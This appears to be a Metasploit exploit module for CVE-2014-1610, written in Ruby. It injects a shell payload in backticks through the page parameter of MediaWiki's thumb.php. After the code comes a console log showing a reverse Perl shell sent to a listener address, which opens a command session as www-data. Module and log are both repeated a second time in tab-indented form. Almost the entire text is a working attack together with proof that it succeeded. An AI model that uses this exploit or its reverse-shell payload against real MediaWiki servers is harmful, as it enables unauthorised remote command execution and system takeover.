brandonprry/mediawiki_djvu_thumb_exec.rb

## mediawiki_djvu_thumb_exec.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Mediawiki thumb.php Djvu Remote Command Execution",
      'Description'    => %q{
      Mediawiki uses djvulibre to convert djvu files to jpeg thumbnails.
      The page parameter when creating these thumbnails is vulnerable to remote
      command execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Brandon Perry'
        ],
      'References'     =>
        [
          ['CVE', '2014-1610']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x20&",

          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl python',
            }
        },
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['Mediawiki', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jan 28 2014",
      'DefaultTarget'  => 0))

      register_options(
      [
         OptString.new('FILENAME', [ true, 'Name of the Djvu image to thumbnail', 'example.djvu' ]),
         OptString.new('TARGETURI', [ true, 'Relative URI of the Mediawiki install', '/mediawiki/']),
      ], self.class)

  end

  def exploit
    send_request_cgi({
      'uri' => normalize_uri(target_uri, '/thumb.php?f=' + datastore['FILENAME'] + "&width=100&page=2`"+payload.encoded+"`"),
    })
  end

end

__END__
msf exploit(mediawiki_djvu_thumb_exec) > show options

Module options (exploit/linux/http/mediawiki_djvu_thumb_exec):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
FILENAME   superhero.djvu   yes       Name of the Djvu image to thumbnail
Proxies                     no        Use a proxy chain
RHOST      192.168.1.48     yes       The target address
RPORT      80               yes       The target port
TARGETURI  /mediawiki/      yes       Relative URI of the Mediawiki install
VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  192.168.1.31     yes       The listen address
LPORT  4444             yes       The listen port


Exploit target:

Id  Name
--  ----
0   Mediawiki


msf exploit(mediawiki_djvu_thumb_exec) > exploit

[*] Started reverse handler on 192.168.1.31:4444
[*] Command shell session 2 opened (192.168.1.31:4444 -> 192.168.1.48:58049) at 2014-01-31 19:48:38 -0600

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux ubuntu 3.8.0-19-generic #29-Ubuntu SMP Wed Apr 17 18:16:28 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
	##
	# This module requires Metasploit: http//metasploit.com/download
	# Current source: https://github.com/rapid7/metasploit-framework
	##

	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
	super(update_info(info,
	'Name' => "Mediawiki thumb.php Djvu Remote Command Execution",
	'Description' => %q{
	Mediawiki uses djvulibre to convert djvu files to jpeg thumbnails.
	The page parameter when creating these thumbnails is vulnerable to remote
	command execution.
	},
	'License' => MSF_LICENSE,
	'Author' =>
	[
	'Brandon Perry'
	],
	'References' =>
	[
	['CVE', '2014-1610']
	],
	'Payload' =>
	{
	'BadChars' => "\x20&",

	'Compat' =>
	{
	'PayloadType' => 'cmd',
	'RequiredCmd' => 'generic perl python',
	}
	},
	'Platform' => ['unix'],
	'Arch' => ARCH_CMD,
	'Targets' =>
	[
	['Mediawiki', {}],
	],
	'Privileged' => false,
	'DisclosureDate' => "Jan 28 2014",
	'DefaultTarget' => 0))

	register_options(
	[
	OptString.new('FILENAME', [ true, 'Name of the Djvu image to thumbnail', 'example.djvu' ]),
	OptString.new('TARGETURI', [ true, 'Relative URI of the Mediawiki install', '/mediawiki/']),
	], self.class)

	end

	def exploit
	send_request_cgi({
	'uri' => normalize_uri(target_uri, '/thumb.php?f=' + datastore['FILENAME'] + "&width=100&page=2`"+payload.encoded+"`"),
	})
	end

	end

	__END__
	msf exploit(mediawiki_djvu_thumb_exec) > show options

	Module options (exploit/linux/http/mediawiki_djvu_thumb_exec):

	Name Current Setting Required Description
	---- --------------- -------- -----------
	FILENAME superhero.djvu yes Name of the Djvu image to thumbnail
	Proxies no Use a proxy chain
	RHOST 192.168.1.48 yes The target address
	RPORT 80 yes The target port
	TARGETURI /mediawiki/ yes Relative URI of the Mediawiki install
	VHOST no HTTP server virtual host


	Payload options (cmd/unix/reverse_perl):

	Name Current Setting Required Description
	---- --------------- -------- -----------
	LHOST 192.168.1.31 yes The listen address
	LPORT 4444 yes The listen port


	Exploit target:

	Id Name
	-- ----
	0 Mediawiki


	msf exploit(mediawiki_djvu_thumb_exec) > exploit

	[*] Started reverse handler on 192.168.1.31:4444
	[*] Command shell session 2 opened (192.168.1.31:4444 -> 192.168.1.48:58049) at 2014-01-31 19:48:38 -0600

	id
	uid=33(www-data) gid=33(www-data) groups=33(www-data)
	uname -a
	Linux ubuntu 3.8.0-19-generic #29-Ubuntu SMP Wed Apr 17 18:16:28 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux